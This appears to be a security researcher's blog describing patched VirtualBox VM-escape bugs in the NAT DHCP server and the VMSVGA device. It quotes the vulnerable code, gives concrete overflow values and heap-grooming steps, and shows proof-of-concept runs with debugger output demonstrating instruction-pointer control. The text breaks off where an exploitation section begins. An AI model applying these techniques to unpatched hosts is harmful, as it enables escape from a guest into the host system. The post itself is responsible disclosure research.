Wednesday, November 21, 2018

VirtualBox NAT DHCP/BOOTP server vulnerabilities

Continuing from my previous blog posts, this is another old set of VirtualBox bugs which can lead to VM escape. A VirtualBox guest in NAT mode (the default networking configuration) gets a per-VM DHCP server which assigns an IP address to the guest.
renorobert@ubuntuguest:~$ ifconfig enp0s3
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:b8:b7:4c  
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:feb8:b74c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:119 errors:0 dropped:0 overruns:0 frame:0
          TX packets:94 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11737 (11.7 KB)  TX bytes:12157 (12.1 KB)
The emulated DHCP server runs at IP address 10.0.2.2. Packets sent to this DHCP server get parsed by the host worker process.
renorobert@ubuntuguest:~$ sudo nmap -sU -p 68 10.0.2.2
. . .
68/udp open|filtered dhcpc
MAC Address: 52:54:00:12:35:03 (QEMU virtual NIC)
Oracle fixed 2 of my bugs, CVE-2016-5610 and CVE-2016-5611, during the Oracle Critical Patch Update - October 2016. The bugs affect VirtualBox versions prior to 5.0.28 and 5.1.8, in the code at src/Vbox/Devices/Network/slirp/bootp.c

DHCP packet is defined in src/Vbox/Devices/Network/slirp/bootp.h as below:
#define DHCP_OPT_LEN            312

/* RFC 2131 */
struct bootp_t
{
    struct ip      ip;                          /**< header: IP header */
    struct udphdr  udp;                         /**< header: UDP header */
    uint8_t        bp_op;                       /**< opcode (BOOTP_REQUEST, BOOTP_REPLY) */
    uint8_t        bp_htype;                    /**< hardware type */
    uint8_t        bp_hlen;                     /**< hardware address length */
    uint8_t        bp_hops;                     /**< hop count */
    uint32_t       bp_xid;                      /**< transaction ID */
    uint16_t       bp_secs;                     /**< numnber of seconds */
    uint16_t       bp_flags;                    /**< flags (DHCP_FLAGS_B) */
    struct in_addr bp_ciaddr;                   /**< client IP address */
    struct in_addr bp_yiaddr;                   /**< your IP address */
    struct in_addr bp_siaddr;                   /**< server IP address */
    struct in_addr bp_giaddr;                   /**< gateway IP address */
    uint8_t        bp_hwaddr[16];               /** client hardware address */
    uint8_t        bp_sname[64];                /** server host name */
    uint8_t        bp_file[128];                /** boot filename */
    uint8_t        bp_vend[DHCP_OPT_LEN];       /**< vendor specific info */
};
The DHCP server maintains an array of BOOTPClient structures (bootp.c) to keep track of all assigned IP addresses.
/** Entry in the table of known DHCP clients. */
typedef struct
{
    uint32_t xid;
    bool allocated;
    uint8_t macaddr[6];
    struct in_addr addr;
    int number;
} BOOTPClient;

/** Number of DHCP clients supported by NAT. */
#define NB_ADDR     16
The array is initialized during VM initialization using bootp_dhcp_init()
int bootp_dhcp_init(PNATState pData)
{
    pData->pbootp_clients = RTMemAllocZ(sizeof(BOOTPClient) * NB_ADDR);
    if (!pData->pbootp_clients)
        return VERR_NO_MEMORY;

    return VINF_SUCCESS;
}
CVE-2016-5611 - Out-of-bounds read vulnerability in dhcp_find_option
static uint8_t *dhcp_find_option(uint8_t *vend, uint8_t tag)
{
    uint8_t *q = vend;
    uint8_t len;
    . . .
    while(*q != RFC1533_END)          // expects  END tag in an untrusted input 
    {
        if (*q == RFC1533_PAD)
        {
            q++;   // incremented without validation 
            continue;
        }
        if (*q == tag)
            return q;   // returns pointer if tag found
        q++;
        len = *q;    
        q += 1 + len;   // length and pointer not validated
    }
    return NULL;
} 
dhcp_find_option() parses the guest-provided bp_vend field in the DHCP packet. However, because of the lack of proper validation, it can return a pointer outside the DHCP packet buffer, or crash the VM if the while loop keeps running until an unmapped address is accessed. One interesting code path for triggering an info leak with this bug is the handling of DHCPDECLINE packets.
bootp.c:65:static uint8_t *dhcp_find_option(uint8_t *vend, uint8_t tag)
bootp.c:412:    req_ip = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
bootp.c:413:    server_ip = dhcp_find_option(&bp->bp_vend[0], RFC2132_SRV_ID);
bootp.c:701:    pu8RawDhcpObject = dhcp_find_option(bp->bp_vend, RFC2132_MSG_TYPE);
bootp.c:726:        parameter_list = dhcp_find_option(&bp->bp_vend[0], RFC2132_PARAM_LIST);
bootp.c:773:            pu8RawDhcpObject = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
static void dhcp_decode(PNATState pData, struct bootp_t *bp, const uint8_t *buf, int size)
{
. . .
        case DHCPDECLINE:
            /* note: pu8RawDhcpObject doesn't point to DHCP header, now it's expected it points
             * to Dhcp Option RFC2132_REQ_ADDR
             */
            pu8RawDhcpObject = dhcp_find_option(&bp->bp_vend[0], RFC2132_REQ_ADDR);
 . . .
            req_ip.s_addr = *(uint32_t *)(pu8RawDhcpObject + 2);
            rc = bootp_cache_lookup_ether_by_ip(pData, req_ip.s_addr, NULL);
            if (RT_FAILURE(rc))
            {
                . . .
                bc->addr.s_addr = req_ip.s_addr;
                slirp_arp_who_has(pData, bc->addr.s_addr);
                LogRel(("NAT: %RTnaipv4 has been already registered\n", req_ip));
            }
            /* no response required */
            break;
. . .
A DHCPDECLINE message is sent by a client suggesting the provided IP address is already in use. This IP address is part of the bp_vend field. The server calls dhcp_find_option() to get a pointer to the IP address within bp_vend field. Here a pointer outside the DHCP buffer can be returned, pointing to some junk data as IP address.

The server first checks if the IP address is already in the assigned list by calling bootp_cache_lookup_ether_by_ip(). If not, it further invokes slirp_arp_who_has() to generate an ARP request with the bytes read outside the DHCP buffer as the IP address. This request will be received by the guest since it's a broadcast packet, thereby leaking some bytes.

To trigger the issue, send a DHCPDECLINE packet with bp_vend filled with RFC1533_PAD. If there is no crash, an ARP packet will be triggered like below:
renorobert@guest:~$ sudo tcpdump -vv -i eth0 arp
[sudo] password for renorobert:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
15:51:34.557995 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 45.103.99.109 (Broadcast) tell 10.0.2.2, length 46
45.103.99.109 are the leaked host process bytes. Link to proof-of-concept code can be found at the end of blog post.

CVE-2016-5610 – Heap overflow in dhcp_decode_request()
static int dhcp_decode_request(PNATState pData, struct bootp_t *bp, struct mbuf *m)
{
. . .
    /*?? renewing ??*/
    switch (dhcp_stat)
    {
        case RENEWING:
 . . .
               Assert((bp->bp_hlen == ETH_ALEN));
               memcpy(bc->macaddr, bp->bp_hwaddr, bp->bp_hlen);
               bc->addr.s_addr = bp->bp_ciaddr.s_addr;
            }
            break;

        case INIT_REBOOT:
 . . .
            Assert((bp->bp_hlen == ETH_ALEN));
            memcpy(bc->macaddr, bp->bp_hwaddr, bp->bp_hlen);
            bc->addr.s_addr = ui32;
            break;
. . .
}
When parsing DHCPREQUEST packets, the bp->bp_hlen field is not validated. The assert statement Assert((bp->bp_hlen == ETH_ALEN)) is compiled out of release builds, leading to heap buffer overflow when copying bp_hwaddr from untrusted DHCP packet to the macaddr field in BOOTPClient structure.

bp_hlen is only a byte, hence the maximum value can be 255. However, the size of the BOOTPClient structure array is greater than 300 bytes. Overflowing within this array is not very interesting as there is no critical data to corrupt. In order to make this overflow interesting, we have to reach the end of the BOOTPClient structure array (pbootp_clients).

The pbootp_clients array can store information about 16 client requests [0...15]. The first element is already used during VM initialization with the guest IP address. To advance further into the array, the guest can send another 14 DHCPREQUEST packets with unique information. When sending the 15th DHCPREQUEST packet, trigger the overflow by setting bp_hlen to its maximum value.

Since pbootp_clients is allocated early during the VM initialization process and overflow is limited to a max of 255 bytes, the adjacent buffer needs to be something interesting. When testing VirtualBox 5.0.26 in Ubuntu 16.04, the adjacent buffer was a uma_zone structure defined in src/Vbox/Devices/Network/slirp/zone.h
# define ZONE_MAGIC 0xdead0002
struct uma_zone
{
    uint32_t magic;
    PNATState pData; /* to minimize changes in the rest of UMA emulation code */
    RTCRITSECT csZone;
    const char *name;
    size_t size; /* item size */
    ctor_t pfCtor;
    dtor_t pfDtor;
    zinit_t pfInit;
    zfini_t pfFini;
    uma_alloc_t pfAlloc;
    uma_free_t pfFree;
    int max_items;
    int cur_items;
    LIST_HEAD(RT_NOTHING, item) used_items;
    LIST_HEAD(RT_NOTHING, item) free_items;
    uma_zone_t master_zone;
    void *area;
    /** Needs call pfnXmitPending when memory becomes available if @c true.
     * @remarks Only applies to the master zone (master_zone == NULL) */
    bool fDoXmitPending;
};
This structure gets used in functions defined in src/Vbox/Devices/Network/slirp/misc.c. Corrupting pfCtor, pfDtor, pfInit, pfFini, pfAlloc or pfFree gives RIP control in NAT thread or the per vCPU EMT thread.

$ sudo ./poc enp0s3
[sudo] password for renorobert: 
poc: [+] Using interface enp0s3...
poc: [+] Sending DHCP requests...
poc: [+] Current IP address : 10.0.2.15
poc: [+] Requesting IP address : 10.0.2.16
poc: [+] Requesting IP address : 10.0.2.17
poc: [+] Requesting IP address : 10.0.2.18
poc: [+] Requesting IP address : 10.0.2.19
poc: [+] Requesting IP address : 10.0.2.20
poc: [+] Requesting IP address : 10.0.2.21
poc: [+] Requesting IP address : 10.0.2.22
poc: [+] Requesting IP address : 10.0.2.23
poc: [+] Requesting IP address : 10.0.2.24
poc: [+] Requesting IP address : 10.0.2.25
poc: [+] Requesting IP address : 10.0.2.26
poc: [+] Requesting IP address : 10.0.2.27
poc: [+] Requesting IP address : 10.0.2.28
poc: [+] Requesting IP address : 10.0.2.29
poc: [+] Requesting IP address : 10.0.2.30
poc: [+] Overflowing bootp_clients into uma_zone structure…
gdb-peda$ c
Continuing.

Thread 11 "EMT" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fd20e4af700 (LWP 27148)]

[----------------------------------registers-----------------------------------]
RAX: 0xfffffe95 
RBX: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
RCX: 0x0 
RDX: 0x0 
RSI: 0x42424242 ('BBBB')
RDI: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
RBP: 0x7fd20e4aeb70 --> 0x7fd20e4aebd0 --> 0x7fd20e4aec10 --> 0x7fd20e4aecd0 --> 0x7fd20e4aece0 --> 0x7fd20e4aed40 (--> ...)
RSP: 0x7fd20e4aeb50 --> 0x7fd1f05e7160 --> 0x0 
RIP: 0x7fd1df22308e (call   QWORD PTR [rbx+0x70])
R8 : 0x0 
R9 : 0x0 
R10: 0x7fd20d529230 --> 0x7fd1df1e5be0 (push   rbp)
R11: 0x0 
R12: 0x7fd1f0852080 --> 0x800 
R13: 0x7fd20e4aeb90 --> 0x100000002 
R14: 0x7fd1f05ea340 ('B' , "\b")
R15: 0x7fd1f05e6f30 --> 0x7fd1df21c5a0 (push   rbp)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fd1df223086: xor    edx,edx
   0x7fd1df223088: mov    esi,DWORD PTR [rbx+0x48]
   0x7fd1df22308b: mov    rdi,rbx
=> 0x7fd1df22308e: call   QWORD PTR [rbx+0x70]
   0x7fd1df223091: test   rax,rax
   0x7fd1df223094: mov    r12,rax
   0x7fd1df223097: je     0x7fd1df2230b5
   0x7fd1df223099: mov    rax,QWORD PTR [rbx+0x50]
Guessed arguments:
arg[0]: 0x7fd1f05ea330 ("CCCCCCCC", 'B' , "\b")
arg[1]: 0x42424242 ('BBBB')
arg[2]: 0x0 
arg[3]: 0x0 
[------------------------------------stack-------------------------------------]
0000| 0x7fd20e4aeb50 --> 0x7fd1f05e7160 --> 0x0 
0008| 0x7fd20e4aeb58 --> 0x7fd1f0852080 --> 0x800 
0016| 0x7fd20e4aeb60 --> 0x7fd1f0852088 --> 0x7fd1dd262f88 --> 0x8ffffffffffff 
0024| 0x7fd20e4aeb68 --> 0x11a 
0032| 0x7fd20e4aeb70 --> 0x7fd20e4aebd0 --> 0x7fd20e4aec10 --> 0x7fd20e4aecd0 --> 0x7fd20e4aece0 --> 0x7fd20e4aed40 (--> ...)
0040| 0x7fd20e4aeb78 --> 0x7fd1df22339f (test   rax,rax)
0048| 0x7fd20e4aeb80 --> 0x7fd20e4aebb0 --> 0x0 
0056| 0x7fd20e4aeb88 --> 0x7fd1f0000020 --> 0x200000000 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fd1df22308e in ?? () from /usr/lib/virtualbox/VBoxDD.so

gdb-peda$ x/gx $rbx+0x70
0x7fd1f05ea3a0: 0xdeadbeef00000000

The proof of concept code for both the bugs can be found at virtualbox-nat-dhcp-bugs

Sunday, November 11, 2018

VirtualBox VMSVGA VM Escape

VirtualBox emulates the VMware virtual SVGA device, whose interface details and programming model are publicly available [2]. Moreover, the paper “GPU Virtualization on VMware’s Hosted I/O Architecture” [1] is a great reference to the architecture of the VMware SVGA device. Kostya Kortchinsky first published “CLOUDBURST - A VMware Guest to Host Escape Story” [3] detailing a VM escape using bugs in the VMware SVGA device.

Similarly Oracle also fixed a bunch of issues in their VMSVGA device (CVE-2014-6595, CVE-2014-6588, CVE-2014-6589, CVE-2014-6590, CVE-2015-0427) during the Critical Patch Update - January 2015 [6]. “Attacking hypervisors through hardware emulation” [4] has some details regarding the VMSVGA bugs in VirtualBox.

It is important to note that VMSVGA device is not enabled by default and probably has very limited users. However, the feature can be enabled as mentioned in the documentation of VBoxManage [5].

VBoxManage modifyvm VMNAME --graphicscontroller vmsvga
Oracle fixed VMSVGA bugs CVE-2017-10210, CVE-2017-10236, CVE-2017-10239, CVE-2017-10240, CVE-2017-10392, CVE-2017-10407 and CVE-2017-10408 which I reported, during the Critical Patch Updates in July 2017 [7] and October 2017 [8]. CVE-2017-10210, CVE-2017-10236, CVE-2017-10239 and CVE-2017-10240 were also found by Li Qiang of the Qihoo 360 Gear Team [7]. This blog post details some of these issues and demonstrates a VM escape using them.

Analysis was carried out in VirtualBox version 5.1.22 for OSX. VirtualBox for Linux is not built with support for VMSVGA 3D features; these features are available only on Windows and OSX.

CVE-2017-10210 - Integer overflow in validating face[0].numMipLevels in vmsvga3dSurfaceDefine (DevVGA-SVGA3d.cpp)

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
    . . .
    /* cFaces must be 6 for a cubemap and 1 otherwise. */
    AssertReturn(cFaces == (uint32_t)((surfaceFlags & SVGA3D_SURFACE_CUBEMAP) ? 6 : 1), VERR_INVALID_PARAMETER);
    AssertReturn(cMipLevels == cFaces * face[0].numMipLevels, VERR_INVALID_PARAMETER);
    . . .
}
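Here “cFaces” can be set to 6 by passing SVGA3D_SURFACE_CUBEMAP in “surfaceFlags”. Then “face[0].numMipLevels” can be set to a value such that the 32-bit product cFaces * face[0].numMipLevels wraps around. “cMipLevels” depends on the number of SVGA3dSize structures passed with the SVGA_3D_CMD_SURFACE_DEFINE command, e.g. with cMipLevels == 2 and face[0].numMipLevels == 0x2aaaaaab, 6 * 0x2aaaaaab == 0x100000002, which truncates to 2 and passes the check.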

face[0].numMipLevels value is used in multiple other commands leading to memory corruption. The PoC for CVE-2017-10210 demonstrates memory corruption using SVGA_3D_CMD_SURFACE_DESTROY command leading to invalid free().

int vmsvga3dSurfaceDestroy(PVGASTATE pThis, uint32_t sid)
{
. . .
        if (pSurface->pMipmapLevels)
        {
            for (uint32_t face=0; face < pSurface->cFaces; face++)
            {
                for (uint32_t i=0; i < pSurface->faces[face].numMipLevels; i++)
                {
                    uint32_t idx = i + face * pSurface->faces[0].numMipLevels;
                    if (pSurface->pMipmapLevels[idx].pSurfaceData)
                        RTMemFree(pSurface->pMipmapLevels[idx].pSurfaceData);
                }
            }
            RTMemFree(pSurface->pMipmapLevels);
        }
. . .
}

renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10210$ sudo ./poc 
[sudo] password for renorobert: 
poc: [+] Triggering the integer overflow using SVGA_3D_CMD_SURFACE_DEFINE...
poc: [+] Triggering the crash using SVGA_3D_CMD_SURFACE_DESTROY...

 [lldbinit] process attach --pid 57984
[-] warning: get_frame() failed. Is the target binary started?
Process 57984 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP
    frame #0: 0x00007fff5f9ae20a libsystem_kernel.dylib`mach_msg_trap + 10
Target 0: (VirtualBoxVM) stopped.

Executable module set to "/Applications/VirtualBox.app/Contents/Resources/VirtualBoxVM.app/Contents/MacOS/VirtualBoxVM".
Architecture set to: x86_64h-apple-macosx.
[lldbinit] c
Process 57984 resuming
-----------------------------------------------------------------------------------------------------------------------[regs]
  RAX: 0x0000000000000000  RBX: 0x000070000E657000  RBP: 0x000070000E656CC0  RSP: 0x000070000E656C88  o d I t s z a P c
  RDI: 0x000000000000DB0B  RSI: 0x0000000000000006  RDX: 0x0000000000000000  RCX: 0x000070000E656C88  RIP: 0x00007FFF5F9B7B66
  R8:  0x0000000000000000  R9:  0x0000000000000000  R10: 0x0000000000000000  R11: 0x0000000000000206  R12: 0x000000000000DB0B
  R13: 0x0000000000000004  R14: 0x0000000000000006  R15: 0x000000000000002D
  CS:  0007  FS: 0000  GS: 0000                                              Jump is taken (c = 0)
-----------------------------------------------------------------------------------------------------------------------[flow]
-----------------------------------------------------------------------------------------------------------------------[code]
__pthread_kill @ libsystem_kernel.dylib:
    0x7fff5f9b7b66: 73 08           jae    0x7fff5f9b7b70            ; <+20>
    0x7fff5f9b7b68: 48 89 c7        mov    rdi, rax
    0x7fff5f9b7b6b: e9 79 6f ff ff  jmp    0x7fff5f9aeae9            ; cerror_nocancel
    0x7fff5f9b7b70: c3              ret    
    0x7fff5f9b7b71: 90              nop    
    0x7fff5f9b7b72: 90              nop    
    0x7fff5f9b7b73: 90              nop    

__pthread_markcancel @ libsystem_kernel.dylib:
    0x7fff5f9b7b74: b8 4c 01 00 02  mov    eax, 0x200014c
-----------------------------------------------------------------------------------------------------------------------------

Process 57984 stopped
* thread #21, name = 'VMSVGA FIFO', stop reason = signal SIGABRT
    frame #0: 0x00007fff5f9b7b66 libsystem_kernel.dylib`__pthread_kill + 10
Target 0: (VirtualBoxVM) stopped.
[lldbinit] bt
* thread #21, name = 'VMSVGA FIFO', stop reason = signal SIGABRT
  * frame #0: 0x00007fff5f9b7b66 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff5fb82080 libsystem_pthread.dylib`pthread_kill + 333
    frame #2: 0x00007fff5f9131ae libsystem_c.dylib`abort + 127
    frame #3: 0x00007fff5fa11822 libsystem_malloc.dylib`free + 521
    frame #4: 0x000000010efbbad1 VBoxDD.dylib`___lldb_unnamed_symbol1176$$VBoxDD.dylib + 305
    frame #5: 0x000000010efb9932 VBoxDD.dylib`___lldb_unnamed_symbol1168$$VBoxDD.dylib + 3682
    frame #6: 0x00000001053d1683 VBoxVMM.dylib`___lldb_unnamed_symbol649$$VBoxVMM.dylib + 115
    frame #7: 0x00000001032db6dc VBoxRT.dylib`___lldb_unnamed_symbol661$$VBoxRT.dylib + 44
    frame #8: 0x0000000103360222 VBoxRT.dylib`___lldb_unnamed_symbol1110$$VBoxRT.dylib + 194
    frame #9: 0x00007fff5fb7f661 libsystem_pthread.dylib`_pthread_body + 340
    frame #10: 0x00007fff5fb7f50d libsystem_pthread.dylib`_pthread_start + 377
    frame #11: 0x00007fff5fb7ebf9 libsystem_pthread.dylib`thread_start + 13
[lldbinit]


CVE-2017-10236 – paMipLevelSizes is not validated leading to integer overflow in vmsvga3dSurfaceDefine (DevVGA-SVGA3d.cpp)

    /* Allocate buffer to hold the surface data until we can move it into a D3D object */
    for (uint32_t i = 0; i < cMipLevels; ++i)
    {
        PVMSVGA3DMIPMAPLEVEL pMipmapLevel = &pSurface->pMipmapLevels[i];
        . . .
        pMipmapLevel->cbSurfacePitch = pSurface->cbBlock * pMipmapLevel->size.width;
        pMipmapLevel->cbSurface      = pMipmapLevel->cbSurfacePitch * pMipmapLevel->size.height * pMipmapLevel->size.depth;
        pMipmapLevel->pSurfaceData   = RTMemAllocZ(pMipmapLevel->cbSurface);
        AssertReturn(pMipmapLevel->pSurfaceData, VERR_NO_MEMORY);
    }
Here the “cbSurfacePitch” and “cbSurface” calculations can overflow since the “paMipLevelSizes” values are fully controlled by the guest. As a result, RTMemAllocZ ends up allocating a smaller buffer than actually needed (due to the invalid calculation of “cbSurface”). This could lead to out-of-bounds reads/writes during usage of “pSurfaceData” in other SVGA commands. The provided PoC only demonstrates an invalid allocation which can be inspected in a debugger and does not trigger any crashes. However, this bug will be later used in the full VM escape exploit.

CVE-2017-10240 and CVE-2017-10408 – Multiple integer overflows in vmsvga3dSurfaceDMA (DevVGA-SVGA3d.cpp)

int vmsvga3dSurfaceDMA(PVGASTATE pThis, SVGA3dGuestImage guest, SVGA3dSurfaceImageId host, SVGA3dTransferType transfer,
                       uint32_t cCopyBoxes, SVGA3dCopyBox *paBoxes)
{
. . .
       for (unsigned i = 0; i < cCopyBoxes; i++)
        {
            . . .
            if (paBoxes[i].x + paBoxes[i].w > pMipLevel->size.width)
                paBoxes[i].w = pMipLevel->size.width - paBoxes[i].x;
            if (paBoxes[i].y + paBoxes[i].h > pMipLevel->size.height)
                paBoxes[i].h = pMipLevel->size.height - paBoxes[i].y;
            if (paBoxes[i].z + paBoxes[i].d > pMipLevel->size.depth)
                paBoxes[i].d = pMipLevel->size.depth - paBoxes[i].z;

            if (    !paBoxes[i].w
                ||  !paBoxes[i].h
                ||  !paBoxes[i].d
                ||   paBoxes[i].x > pMipLevel->size.width
                ||   paBoxes[i].y > pMipLevel->size.height
                ||   paBoxes[i].z > pMipLevel->size.depth)
            {
                . . .
                continue;
            }
            uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);
. . .
}
In this case, the “paBoxes” validation against “pMipLevel” can first be bypassed because the additions can overflow. Then the “uDestOffset” validation against “pMipLevel->cbSurface” can also be bypassed due to integer overflow. Similar code patterns were found in multiple places. “uDestOffset” is used for computing the “pBufferStart” argument during the call to vmsvgaGMRTransfer, leading to an out-of-bounds read or write based on the value of SVGA3dTransferType - SVGA3D_WRITE_HOST_VRAM or SVGA3D_READ_HOST_VRAM. The PoC for this bug accesses memory at an offset of ~4GB from pMipLevel->pSurfaceData, leading to a crash. This bug can be exploited by spraying the heap and allocating the accessed memory region.

renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10240+10408$ make
gcc -Wall -ggdb -std=gnu99 -o poc svga.c poc.c -lpciaccess
renorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10240+10408$ sudo ./poc 
[sudo] password for renorobert:

[lldbinit] process attach --pid 14518
[-] warning: get_frame() failed. Is the target binary started?
Process 14518 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP
    frame #0: 0x00007fff5f9ae20a libsystem_kernel.dylib`mach_msg_trap + 10
Target 0: (VirtualBoxVM) stopped.

Executable module set to "/Applications/VirtualBox.app/Contents/Resources/VirtualBoxVM.app/Contents/MacOS/VirtualBoxVM".
Architecture set to: x86_64h-apple-macosx.
[lldbinit] c
Process 14518 resuming
-----------------------------------------------------------------------------------------------------------------------[regs]
  RAX: 0x00007F976656CEB8  RBX: 0x0000000111C1C000  RBP: 0x00007000066CAC10  RSP: 0x00007000066CAC10  o d I t s Z a P c
  RDI: 0x00007F976656CEB8  RSI: 0x0000000111C1C000  RDX: 0x0000000000000000  RCX: 0x4141414141414141  RIP: 0x00007FFF5FB78FD0
  R8:  0x4141414141414141  R9:  0x0000000000000000  R10: 0x00000000FFFFFFFE  R11: 0x00007F9654950EB8  R12: 0x0000000000000000
  R13: 0x0000000000000001  R14: 0x00007F976656CEB8  R15: 0x0000000000000001
  CS:  002B  FS: 0000  GS: 0000                                              
-----------------------------------------------------------------------------------------------------------------------[flow]
-----------------------------------------------------------------------------------------------------------------------[code]
_platform_memmove$VARIANT$Haswell @ libsystem_platform.dylib:
    0x7fff5fb78fd0: 48 89 0f     mov    qword ptr [rdi], rcx
    0x7fff5fb78fd3: 4c 89 04 17  mov    qword ptr [rdi + rdx], r8
    0x7fff5fb78fd7: 5d           pop    rbp
    0x7fff5fb78fd8: c3           ret    
    0x7fff5fb78fd9: 48 83 c2 08  add    rdx, 0x8
    0x7fff5fb78fdd: 74 25        je     0x7fff5fb79004            ; <+228>
    0x7fff5fb78fdf: 4d 31 c0     xor    r8, r8
    0x7fff5fb78fe2: 42 8a 0c 06  mov    cl, byte ptr [rsi + r8]
-----------------------------------------------------------------------------------------------------------------------------

Process 14518 stopped
* thread #21, name = 'VMSVGA FIFO', stop reason = EXC_BAD_ACCESS (code=1, address=0x7f976656ceb8)
    frame #0: 0x00007fff5fb78fd0 libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 176
Target 0: (VirtualBoxVM) stopped.
[lldbinit] vmmap -a 0x00007F976656CEB8
[lldbinit] bt
* thread #21, name = 'VMSVGA FIFO', stop reason = EXC_BAD_ACCESS (code=1, address=0x7f976656ceb8)
  * frame #0: 0x00007fff5fb78fd0 libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 176
    frame #1: 0x0000000110e1a6bf VBoxDD.dylib`___lldb_unnamed_symbol1154$$VBoxDD.dylib + 671
    frame #2: 0x0000000110e2207d VBoxDD.dylib`___lldb_unnamed_symbol1178$$VBoxDD.dylib + 861
    frame #3: 0x0000000110e1fa09 VBoxDD.dylib`___lldb_unnamed_symbol1168$$VBoxDD.dylib + 3897
    frame #4: 0x0000000107a17683 VBoxVMM.dylib`___lldb_unnamed_symbol649$$VBoxVMM.dylib + 115
    frame #5: 0x00000001059216dc VBoxRT.dylib`___lldb_unnamed_symbol661$$VBoxRT.dylib + 44
    frame #6: 0x00000001059a6222 VBoxRT.dylib`___lldb_unnamed_symbol1110$$VBoxRT.dylib + 194
    frame #7: 0x00007fff5fb7f661 libsystem_pthread.dylib`_pthread_body + 340
    frame #8: 0x00007fff5fb7f50d libsystem_pthread.dylib`_pthread_start + 377
    frame #9: 0x00007fff5fb7ebf9 libsystem_pthread.dylib`thread_start + 13
[lldbinit]


CVE-2017-10407 - Integer overflow in vmsvgaGMRTransfer (DevVGA-SVGA.cpp)

int vmsvgaGMRTransfer(PVGASTATE pThis, const SVGA3dTransferType enmTransferType, uint8_t *pbDst, int32_t cbDestPitch,
                      SVGAGuestPtr src, uint32_t offSrc, int32_t cbSrcPitch, uint32_t cbWidth, uint32_t cHeight)
{
. . .
        AssertMsgReturn(offSrc + cbSrcPitch * (cHeight - 1) + cbWidth <= pThis->vram_size,
                        ("src.offset=%#x offSrc=%#x cbSrcPitch=%#x cHeight=%#x cbWidth=%#x vram_size=%#x\n",
                         src.offset, offSrc, cbSrcPitch, cHeight, cbWidth, pThis->vram_size),
                        VERR_INVALID_PARAMETER);

        uint8_t *pSrc  = pThis->CTX_SUFF(vram_ptr) + offSrc;
. . .
}
The “offSrc” validation can overflow and the check against “vram_size” can be bypassed. This leads to out of bound read or write relative to the VRAM. vmsvgaGMRTransfer is used by multiple SVGA commands like SVGA_CMD_BLIT_GMRFB_TO_SCREEN, SVGA_3D_CMD_SURFACE_DMA, SVGA_3D_CMD_BLIT_SURFACE_TO_SCREEN etc.

In SVGA_CMD_BLIT_GMRFB_TO_SCREEN, the “offsetDest” is validated against the vram_size. Hence the destination of the write can only start from within the VRAM buffer. However, the “offsetSource” can end up pointing beyond the VRAM buffer at a controlled offset, providing a reliable info leak.

case SVGA_CMD_BLIT_GMRFB_TO_SCREEN:
            {
 . . .
                unsigned offsetSource = (pCmd->srcOrigin.x * pSVGAState->GMRFB.format.s.bitsPerPixel) / 8 + pSVGAState->GMRFB.bytesPerLine * pCmd->srcOrigin.y;
                unsigned offsetDest   = (pCmd->destRect.left * RT_ALIGN(pThis->svga.uBpp, 8)) / 8 + pThis->svga.cbScanline * pCmd->destRect.top;
                unsigned cbCopyWidth  = (width * RT_ALIGN(pThis->svga.uBpp, 8)) / 8;

                AssertBreak(offsetDest < pThis->vram_size);

                rc = vmsvgaGMRTransfer(pThis, SVGA3D_WRITE_HOST_VRAM, pThis->CTX_SUFF(vram_ptr) + offsetDest, pThis->svga.cbScanline, pSVGAState->GMRFB.ptr, offsetSource, pSVGAState->GMRFB.bytesPerLine, cbCopyWidth, height);
The PoC provided demonstrates OOB access relative to VRAM using SVGA_CMD_BLIT_GMRFB_TO_SCREEN and SVGA_3D_CMD_SURFACE_DMA.

Exploitation:

There are various bugs providing numerous combinations and primitives. I chose to use the bugs in vmsvga3dSurfaceDefine and vmsvga3dSurfaceDMA to demonstrate a full VM escape:

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
. . .
    /* Allocate buffer to hold the surface data until we can move it into a D3D object */
    for (uint32_t i = 0; i < cMipLevels; ++i)
    {
        PVMSVGA3DMIPMAPLEVEL pMipmapLevel = &pSurface->pMipmapLevels[i];
        . . .
        pMipmapLevel->cbSurfacePitch = pSurface->cbBlock * pMipmapLevel->size.width;
